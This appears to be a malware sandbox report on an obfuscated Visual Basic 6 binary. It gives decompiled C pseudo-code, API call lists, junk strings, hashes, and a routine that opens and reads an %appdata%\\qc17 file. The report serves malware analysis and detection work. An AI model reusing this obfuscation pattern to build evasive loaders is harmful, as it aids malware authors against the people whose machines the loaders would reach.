__vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 004211A9
#513.MSVBVM60(?,00000008,000000EA), ref: 004211D8
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 004211E1
__vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 004211EB
__vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 004211F3
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 00421202
__vbaVarDup.MSVBVM60 ref: 00421227
#542.MSVBVM60(?,?), ref: 00421234
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00421258
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0042126E
#690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00421299
__vbaNew2.MSVBVM60(0040257C,004233C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 004212B1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014), ref: 00421313
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000110), ref: 0042136F
__vbaStrMove.MSVBVM60(00000000,?,0040258C,00000110), ref: 00421399
__vbaFreeObj.MSVBVM60(00000000,?,0040258C,00000110), ref: 004213A1
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 004213AE
__vbaFreeStr.MSVBVM60(00421430,?,?,?,?,?,?,00401546), ref: 004213FA
__vbaFreeStr.MSVBVM60(00421430,?,?,?,?,?,?,00401546), ref: 00421402
__vbaFreeStr.MSVBVM60(00421430,?,?,?,?,?,?,00401546), ref: 0042140A
__vbaFreeStr.MSVBVM60(00421430,?,?,?,?,?,?,00401546), ref: 00421412

Strings

ADDEDLY, xrefs: 0042128F
DIVARICATE, xrefs: 004213A6
Apokreos, xrefs: 0042119A
Antagonistiske, xrefs: 0042128A
RESELLS, xrefs: 00421294
12/12/12, xrefs: 0042120A
Sjkler7, xrefs: 00421285
monacanthid, xrefs: 00421126
Pollenate4, xrefs: 00421181

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
API String ID: 3384239285-254499488
Opcode ID: b4c1d322ae9dab1fee82d9749d6fb69f24f2c11bb1497994503ec35bfd41f4c9
Instruction ID: bcd31bac1dccc53cb35baaa5f53609fde79be3e9dfcb606670060c9233a4133b
Opcode Fuzzy Hash: b4c1d322ae9dab1fee82d9749d6fb69f24f2c11bb1497994503ec35bfd41f4c9
Instruction Fuzzy Hash: CAA1F671E00218ABDB10EF91D886FDEB7B8BF14308F5081AAF505B71A1EB785A49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9FE, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041F9FE(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				intOrPtr _v168;
				char _v176;
				void* _v180;
				short _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed int _t90;
				char* _t99;
				short _t100;
				char* _t104;
				signed int _t119;
				signed int _t124;
				intOrPtr _t154;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t154;
				L00401540();
				_v12 = _t154;
				_v8 = 0x4013a0;
				_v136 = L"appdata";
				_v144 = 8;
				L0040184C();
				_t90 =  &_v64;
				_push(_t90);
				L00401642();
				L0040183A();
				_push(_t90);
				_push(L"Picry");
				L0040172C();
				asm("sbb eax, eax");
				_v184 =  ~( ~( ~_t90));
				L00401846();
				L00401828();
				if(_v184 != 0) {
					_v136 = L"Langfredagene5";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L004016BA();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_push( &_v64);
					_push(2);
					L00401840();
					_t154 = _t154 + 0xc;
					if( *0x4233c0 != 0) {
						_v204 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v204 = 0x4233c0;
					}
					_v184 =  *_v204;
					_t119 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v48);
					asm("fclex");
					_v188 = _t119;
					if(_v188 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v184);
						_push(_v188);
						L004017C8();
						_v208 = _t119;
					}
					_v192 = _v48;
					_t124 =  *((intOrPtr*)( *_v192 + 0x70))(_v192,  &_v180);
					asm("fclex");
					_v196 = _t124;
					if(_v196 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40258c);
						_push(_v192);
						_push(_v196);
						L004017C8();
						_v212 = _t124;
					}
					_v28 = _v180;
					L004017C2();
				}
				_v72 = 0x93;
				_v80 = 2;
				_v136 = L"SUPERSERIOUS";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push(0xb2);
				_push( &_v64);
				_push( &_v96);
				L0040168A();
				_v168 = 0x454add;
				_v176 = 0x8003;
				_push( &_v96);
				_t99 =  &_v112;
				_push(_t99);
				L0040163C();
				_push(_t99);
				_t100 =  &_v176;
				_push(_t100);
				L00401738();
				_v184 = _t100;
				_push( &_v96);
				_push( &_v80);
				_push( &_v64);
				_push(3);
				L00401840();
				_t104 = _v184;
				if(_t104 != 0) {
					_v136 = L"Skovede1";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L00401852();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_t104 =  &_v64;
					_push(_t104);
					_push(2);
					L00401840();
					_push(L"galopbanernes");
					L004017E0();
					_push(_t104);
					L004016B4();
					L0040183A();
				}
				_v32 = 0xd66;
				_push(0x41fd43);
				L00401846();
				L00401846();
				L00401846();
				return _t104;
			}

0x0041fa03
0x0041fa0e
0x0041fa0f
0x0041fa1b
0x0041fa23
0x0041fa26
0x0041fa2d
0x0041fa37
0x0041fa4a
0x0041fa4f
0x0041fa52
0x0041fa53
0x0041fa5d
0x0041fa62
0x0041fa63
0x0041fa68
0x0041fa6f
0x0041fa75
0x0041fa7f
0x0041fa87
0x0041fa95
0x0041fa9b
0x0041faa5
0x0041fab8
0x0041fac0
0x0041fac4
0x0041fac5
0x0041facd
0x0041face
0x0041fad8
0x0041fae0
0x0041fae4
0x0041fae5
0x0041fae7
0x0041faec
0x0041faf6
0x0041fb13
0x0041faf8
0x0041faf8
0x0041fafd
0x0041fb02
0x0041fb07
0x0041fb07
0x0041fb25
0x0041fb3d
0x0041fb40
0x0041fb42
0x0041fb4f
0x0041fb71
0x0041fb51
0x0041fb51
0x0041fb53
0x0041fb58
0x0041fb5e
0x0041fb64
0x0041fb69
0x0041fb69
0x0041fb7b
0x0041fb96
0x0041fb99
0x0041fb9b
0x0041fba8
0x0041fbca
0x0041fbaa
0x0041fbaa
0x0041fbac
0x0041fbb1
0x0041fbb7
0x0041fbbd
0x0041fbc2
0x0041fbc2
0x0041fbd8
0x0041fbdf
0x0041fbdf
0x0041fbe4
0x0041fbeb
0x0041fbf2
0x0041fbfc
0x0041fc0f
0x0041fc17
0x0041fc18
0x0041fc20
0x0041fc24
0x0041fc25
0x0041fc2a
0x0041fc34
0x0041fc41
0x0041fc42
0x0041fc45
0x0041fc46
0x0041fc4b
0x0041fc4c
0x0041fc52
0x0041fc53
0x0041fc58
0x0041fc62
0x0041fc66
0x0041fc6a
0x0041fc6b
0x0041fc6d
0x0041fc75
0x0041fc7e
0x0041fc80
0x0041fc8a
0x0041fc9d
0x0041fca5
0x0041fca9
0x0041fcaa
0x0041fcb2
0x0041fcb3
0x0041fcbd
0x0041fcc5
0x0041fcc6
0x0041fcc9
0x0041fcca
0x0041fccc
0x0041fcd4
0x0041fcd9
0x0041fcde
0x0041fcdf
0x0041fce9
0x0041fce9
0x0041fcee
0x0041fcf4
0x0041fd2d
0x0041fd35
0x0041fd3d
0x0041fd42

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FA1B
__vbaVarDup.MSVBVM60 ref: 0041FA4A
#667.MSVBVM60(?), ref: 0041FA53
__vbaStrMove.MSVBVM60(?), ref: 0041FA5D
__vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041FA68
__vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041FA7F
__vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041FA87
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041FAB8
#518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041FAC5
__vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041FACE
__vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041FAD8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041FAE7
__vbaNew2.MSVBVM60(0040257C,004233C0), ref: 0041FB02
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014), ref: 0041FB64
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000070), ref: 0041FBBD
__vbaFreeObj.MSVBVM60(00000000,?,0040258C,00000070), ref: 0041FBDF
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041FC0F
#629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FC25
__vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FC46
__vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FC53
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FC6D
__vbaVarDup.MSVBVM60 ref: 0041FC9D
#522.MSVBVM60(?,?), ref: 0041FCAA
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FCB3
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FCBD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FCCC
__vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041FCD9
__vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041FCDF
__vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041FCE9
__vbaFreeStr.MSVBVM60(0041FD43,?,?,?,?,00401546), ref: 0041FD2D
__vbaFreeStr.MSVBVM60(0041FD43,?,?,?,?,00401546), ref: 0041FD35
__vbaFreeStr.MSVBVM60(0041FD43,?,?,?,?,00401546), ref: 0041FD3D

Strings

appdata, xrefs: 0041FA2D
Picry, xrefs: 0041FA63
Langfredagene5, xrefs: 0041FA9B
f, xrefs: 0041FCEE
SUPERSERIOUS, xrefs: 0041FBF2
galopbanernes, xrefs: 0041FCD4
Skovede1, xrefs: 0041FC80

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
API String ID: 1362175604-1043247457
Opcode ID: dfefc73b90ba9b75f13a1e1fd4232b26a24a605ff2b50907f2407b91d8b5aeae
Instruction ID: a8fea8233400d89612141e8ffdd170eceaee424b1f03cfab6a41bb8f1d755e1c
Opcode Fuzzy Hash: dfefc73b90ba9b75f13a1e1fd4232b26a24a605ff2b50907f2407b91d8b5aeae
Instruction Fuzzy Hash: 5E81F971D00218AADB14EB91DC45FDEB7B8BF04304F1085AAE105B71A1EF785B49CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD60, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041FD60(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				char* _v100;
				char _v108;
				char* _v116;
				char _v124;
				short _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				signed int _t69;
				signed int _t73;
				short _t77;
				char* _t82;
				intOrPtr _t111;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				L00401540();
				_v12 = _t111;
				_v8 = 0x4013b0;
				if( *0x4233c0 != 0) {
					_v164 = 0x4233c0;
				} else {
					_push(0x4233c0);
					_push(0x40257c);
					L004017CE();
					_v164 = 0x4233c0;
				}
				_v144 =  *_v164;
				_t69 =  *((intOrPtr*)( *_v144 + 0x4c))(_v144,  &_v44);
				asm("fclex");
				_v148 = _t69;
				if(_v148 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x40256c);
					_push(_v144);
					_push(_v148);
					L004017C8();
					_v168 = _t69;
				}
				_v152 = _v44;
				_t73 =  *((intOrPtr*)( *_v152 + 0x28))(_v152);
				asm("fclex");
				_v156 = _t73;
				if(_v156 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x402ec8);
					_push(_v152);
					_push(_v156);
					L004017C8();
					_v172 = _t73;
				}
				L004017C2();
				_push(0x3139);
				L0040169C();
				L0040183A();
				_push(0x64);
				_push(_v32);
				L00401750();
				L0040183A();
				_push(_t73);
				_push(L"Sciuroid8");
				L0040172C();
				asm("sbb eax, eax");
				_v144 =  ~( ~( ~_t73));
				L00401846();
				_t77 = _v144;
				if(_t77 != 0) {
					_v100 = L"appdata";
					_v108 = 8;
					L0040184C();
					_push( &_v60);
					_push( &_v76);
					L0040171A();
					_v116 = L"\\qc17";
					_v124 = 8;
					_push( &_v76);
					_push( &_v124);
					_t82 =  &_v92;
					_push(_t82);
					L00401720();
					_push(_t82);
					L00401834();
					L0040183A();
					_push(_t82);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v24);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0x59);
					_push( &_v60);
					L00401708();
					_t77 =  &_v60;
					_push(_t77);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"Rutiner");
				L004017EC();
				_v28 = _t77;
				_push(0x41ffdc);
				L00401846();
				L00401846();
				L00401846();
				return _t77;
			}

0x0041fd65
0x0041fd70
0x0041fd71
0x0041fd7d
0x0041fd85
0x0041fd88
0x0041fd96
0x0041fdb3
0x0041fd98
0x0041fd98
0x0041fd9d
0x0041fda2
0x0041fda7
0x0041fda7
0x0041fdc5
0x0041fddd
0x0041fde0
0x0041fde2
0x0041fdef
0x0041fe11
0x0041fdf1
0x0041fdf1
0x0041fdf3
0x0041fdf8
0x0041fdfe
0x0041fe04
0x0041fe09
0x0041fe09
0x0041fe1b
0x0041fe2f
0x0041fe32
0x0041fe34
0x0041fe41
0x0041fe63
0x0041fe43
0x0041fe43
0x0041fe45
0x0041fe4a
0x0041fe50
0x0041fe56
0x0041fe5b
0x0041fe5b
0x0041fe6d
0x0041fe72
0x0041fe77
0x0041fe81
0x0041fe86
0x0041fe88
0x0041fe8b
0x0041fe95
0x0041fe9a
0x0041fe9b
0x0041fea0
0x0041fea7
0x0041fead
0x0041feb7
0x0041febc
0x0041fec5
0x0041fecb
0x0041fed2
0x0041fedf
0x0041fee7
0x0041feeb
0x0041feec
0x0041fef1
0x0041fef8
0x0041ff02
0x0041ff06
0x0041ff07
0x0041ff0a
0x0041ff0b
0x0041ff10
0x0041ff11
0x0041ff1b
0x0041ff20
0x0041ff21
0x0041ff23
0x0041ff25
0x0041ff2a
0x0041ff32
0x0041ff3a
0x0041ff3e
0x0041ff42
0x0041ff43
0x0041ff45
0x0041ff4d
0x0041ff52
0x0041ff53
0x0041ff55
0x0041ff5a
0x0041ff5c
0x0041ff61
0x0041ff66
0x0041ff67
0x0041ff6c
0x0041ff6f
0x0041ff70
0x0041ff7a
0x0041ff82
0x0041ff82
0x0041ff87
0x0041ff8c
0x0041ff91
0x0041ff95
0x0041ffc6
0x0041ffce
0x0041ffd6
0x0041ffdb

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FD7D
__vbaNew2.MSVBVM60(0040257C,004233C0,?,?,?,?,00401546), ref: 0041FDA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,0000004C), ref: 0041FE04
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 0041FE56
__vbaFreeObj.MSVBVM60 ref: 0041FE6D
#697.MSVBVM60(00003139), ref: 0041FE77
__vbaStrMove.MSVBVM60(00003139), ref: 0041FE81
#618.MSVBVM60(?,00000064,00003139), ref: 0041FE8B
__vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041FE95
__vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEA0
__vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEB7
__vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEDF
#666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEEC
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FF0B
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FF11
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FF1B
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FF2A
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FF32
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041FF45
__vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041FF55
__vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041FF5C
#526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041FF67
__vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FF70
__vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FF7A
__vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FF82
#696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FF8C
__vbaFreeStr.MSVBVM60(0041FFDC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FFC6
__vbaFreeStr.MSVBVM60(0041FFDC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FFCE
__vbaFreeStr.MSVBVM60(0041FFDC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FFD6

Strings

appdata, xrefs: 0041FECB
Sciuroid8, xrefs: 0041FE9B
\qc17, xrefs: 0041FEF1
Rutiner, xrefs: 0041FF87

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
String ID: Rutiner$Sciuroid8$\qc17$appdata
API String ID: 862176544-1118470403
Opcode ID: 979b6ee310e5f22eba6e9cb30c588bb3f9c61f8cd40481fcf31aa72c255d48d6
Instruction ID: 8482c8bf974ba601392a6c444e04add708b2f007661e38b112043fa631f94310
Opcode Fuzzy Hash: 979b6ee310e5f22eba6e9cb30c588bb3f9c61f8cd40481fcf31aa72c255d48d6
Instruction Fuzzy Hash: B8510C71940218AEDB10EBA1CC46FDEB7B8AF15708F1041BAF105B71E1DB785A89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF2A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041EF2A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				short _v40;
				char _v44;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				void* _v100;
				char _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				char* _t86;
				char* _t87;
				signed int _t91;
				signed int _t98;
				short _t102;
				signed int _t108;
				signed int _t113;
				void* _t134;
				void* _t136;
				intOrPtr _t137;

				_t137 = _t136 - 0xc;
				 *[fs:0x0] = _t137;
				L00401540();
				_v16 = _t137;
				_v12 = 0x401330;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401546, _t134);
				L00401708();
				_t86 =  &_v44;
				L00401858();
				L004016D8();
				L0040183A();
				L00401846();
				L00401828();
				L00401792();
				_t87 =  &_v48;
				L00401798();
				_v108 = _t87;
				_t91 =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v104, _t87, _t86, L"Flimflam", L"Fribords2", _t86, _t86,  &_v64, 1, 0xffffffff, 0,  &_v64, 0xe8);
				asm("fclex");
				_v112 = _t91;
				if(_v112 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40264c);
					_push(_v108);
					_push(_v112);
					L004017C8();
					_v132 = _t91;
				}
				_v56 = _v104;
				_v64 = 3;
				_push( &_v64);
				_push( &_v80);
				L00401678();
				_push( &_v80);
				L00401834();
				L0040183A();
				L004017C2();
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401840();
				_v56 = 0x7042c;
				_v64 = 3;
				_t98 =  &_v64;
				_push(_t98);
				L004017E6();
				L0040183A();
				_push(_t98);
				_push(L"INVALIDNESS");
				L0040172C();
				asm("sbb eax, eax");
				_v108 =  ~( ~_t98 + 1);
				L00401846();
				L00401828();
				_t102 = _v108;
				if(_t102 != 0) {
					L00401672();
					L0040183A();
					if( *0x4233c0 != 0) {
						_v136 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v136 = 0x4233c0;
					}
					_v108 =  *_v136;
					_t108 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v48);
					asm("fclex");
					_v112 = _t108;
					if(_v112 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v108);
						_push(_v112);
						L004017C8();
						_v140 = _t108;
					}
					_v116 = _v48;
					_t113 =  *((intOrPtr*)( *_v116 + 0x68))(_v116,  &_v100);
					asm("fclex");
					_v120 = _t113;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x40258c);
						_push(_v116);
						_push(_v120);
						L004017C8();
						_v144 = _t113;
					}
					_t102 = _v100;
					_v40 = _t102;
					L004017C2();
				}
				_push(0x41f1ad);
				L00401846();
				L00401846();
				L00401846();
				return _t102;
			}

0x0041ef2d
0x0041ef3c
0x0041ef46
0x0041ef4e
0x0041ef51
0x0041ef58
0x0041ef67
0x0041ef73
0x0041ef82
0x0041ef86
0x0041ef96
0x0041efa0
0x0041efa8
0x0041efb0
0x0041efb5
0x0041efbb
0x0041efbf
0x0041efc4
0x0041efd3
0x0041efd6
0x0041efd8
0x0041efdf
0x0041eff8
0x0041efe1
0x0041efe1
0x0041efe3
0x0041efe8
0x0041efeb
0x0041efee
0x0041eff3
0x0041eff3
0x0041efff
0x0041f002
0x0041f00c
0x0041f010
0x0041f011
0x0041f019
0x0041f01a
0x0041f024
0x0041f02c
0x0041f034
0x0041f038
0x0041f039
0x0041f03b
0x0041f043
0x0041f04a
0x0041f051
0x0041f054
0x0041f055
0x0041f05f
0x0041f064
0x0041f065
0x0041f06a
0x0041f071
0x0041f076
0x0041f07d
0x0041f085
0x0041f08a
0x0041f090
0x0041f096
0x0041f0a0
0x0041f0ac
0x0041f0c9
0x0041f0ae
0x0041f0ae
0x0041f0b3
0x0041f0b8
0x0041f0bd
0x0041f0bd
0x0041f0db
0x0041f0ea
0x0041f0ed
0x0041f0ef
0x0041f0f6
0x0041f112
0x0041f0f8
0x0041f0f8
0x0041f0fa
0x0041f0ff
0x0041f102
0x0041f105
0x0041f10a
0x0041f10a
0x0041f11c
0x0041f12b
0x0041f12e
0x0041f130
0x0041f137
0x0041f153
0x0041f139
0x0041f139
0x0041f13b
0x0041f140
0x0041f143
0x0041f146
0x0041f14b
0x0041f14b
0x0041f15a
0x0041f15e
0x0041f165
0x0041f165
0x0041f16a
0x0041f197
0x0041f19f
0x0041f1a7
0x0041f1ac

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EF46
#526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041EF73
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EF86
#712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EF96
__vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EFA0
__vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EFA8
__vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EFB0
#685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EFB5
__vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041EFBF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041EFEE
#613.MSVBVM60(?,00000003), ref: 0041F011
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041F01A
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041F024
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041F02C
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041F03B
#574.MSVBVM60(00000003), ref: 0041F055
__vbaStrMove.MSVBVM60(00000003), ref: 0041F05F
__vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041F06A
__vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041F07D
__vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041F085
#611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041F096
__vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041F0A0
__vbaNew2.MSVBVM60(0040257C,004233C0,INVALIDNESS,00000000,00000003), ref: 0041F0B8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014), ref: 0041F105
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000068), ref: 0041F146
__vbaFreeObj.MSVBVM60(00000000,?,0040258C,00000068), ref: 0041F165
__vbaFreeStr.MSVBVM60(0041F1AD,INVALIDNESS,00000000,00000003), ref: 0041F197
__vbaFreeStr.MSVBVM60(0041F1AD,INVALIDNESS,00000000,00000003), ref: 0041F19F
__vbaFreeStr.MSVBVM60(0041F1AD,INVALIDNESS,00000000,00000003), ref: 0041F1A7

Strings

Fribords2, xrefs: 0041EF8C
Flimflam, xrefs: 0041EF91
INVALIDNESS, xrefs: 0041F065

Memory Dump Source

